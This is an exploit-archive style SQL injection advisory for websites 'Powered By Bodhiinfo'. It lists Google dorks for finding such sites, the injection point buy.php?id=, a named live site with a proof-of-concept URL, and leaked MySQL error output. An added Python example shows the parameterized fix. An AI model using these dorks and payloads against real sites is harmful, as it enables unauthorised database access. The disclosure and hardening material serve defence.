
Powered By Bodhiinfo Business Solutions Kerala India SQL

Author: KingSkrupellos, Published: 08-10-2018
################################################################################################

# Exploit Title : Powered By Bodhiinfo Business Solutions Kerala India SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/10/2018
# Vendor Homepage : bodhiinfo.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork :

intext:''Powered By Bodhii''

intext:''Powered By Bodhiinfo''

intext:''Copyright © 2018 Bodhi. All Rights Reserved''

# SQL Injection Exploit :

/buy.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Site => flavormart.in/buy.php?id=42%27 => [ Proof of Concept ] => archive.is/QJmID

# SQL Database Error =>

MySQL Query fail: SELECT product_purchase.ID, product_creation.productName, product_creation.description,
product_creation.features, product_purchase.originalRate, product_purchase.flavormartRate FROM product_purchase,
product_creation WHERE product_purchase.ID='42'' AND product_purchase.productCreateId =
product_creation.ID ORDER BY product_purchase.ID DESC

You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near ''42'' AND product_purchase.productCreateId
= product_creation.ID ' at line 8

MySQL Query fail: SELECT purchase_type.purchaseId ID, purchase_type.typeId FROM
purchase_type WHERE purchase_type.purchaseId='42''

You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ''42''' at line 4
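
The error output above shows the id value landing inside a quoted literal in the query text and the raw MySQL error being returned to the visitor. The following is an added example, not code from the advisory or the vendor: it rebuilds that query shape next to a validated, parameter-bound form. Assumptions: Python's sqlite3 stands in for the PHP/MySQL stack, the function names are hypothetical, and the table rows are constructed (only the table and column names come from the error output).

```python
import sqlite3

# Constructed schema and row: table/column names come from the error output
# above; the data and the SQLite stand-in for MySQL are assumptions.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE product_creation (ID INTEGER PRIMARY KEY, productName TEXT);
        CREATE TABLE product_purchase (ID INTEGER PRIMARY KEY,
            productCreateId INTEGER, originalRate REAL);
        INSERT INTO product_creation VALUES (7, 'Sample product');
        INSERT INTO product_purchase VALUES (42, 7, 199.0);
    """)
    return db

def lookup_concatenated(db, raw_id):
    """'Before' form: the id is pasted into the SQL text, as the error shows."""
    sql = ("SELECT product_purchase.ID, product_creation.productName "
           "FROM product_purchase, product_creation "
           "WHERE product_purchase.ID='" + raw_id + "' "
           "AND product_purchase.productCreateId = product_creation.ID")
    return db.execute(sql).fetchall()

def lookup_parameterized(db, raw_id):
    """Hardened form: validate the id as an integer, then bind it."""
    if not raw_id.isascii() or not raw_id.isdigit():
        return None  # caller should answer with a generic 400/404, no SQL text
    sql = ("SELECT product_purchase.ID, product_creation.productName "
           "FROM product_purchase, product_creation "
           "WHERE product_purchase.ID = ? "
           "AND product_purchase.productCreateId = product_creation.ID")
    return db.execute(sql, (int(raw_id),)).fetchall()

def demo():
    db = make_db()
    results = {}
    for raw_id in ("42", "42'"):  # the two id values that appear on this page
        try:
            before = lookup_concatenated(db, raw_id)
        except sqlite3.Error as exc:
            # Log server-side only; the page's site echoed this to the visitor.
            before = "error: " + type(exc).__name__
        results[raw_id] = (before, lookup_parameterized(db, raw_id))
    return results

if __name__ == "__main__":
    for raw_id, (before, after) in demo().items():
        print(repr(raw_id), "concatenated:", before, "| parameterized:", after)
```

With the bound form the quote character never reaches the SQL parser, so the request is rejected before any query runs and no database error text exists to leak.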

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
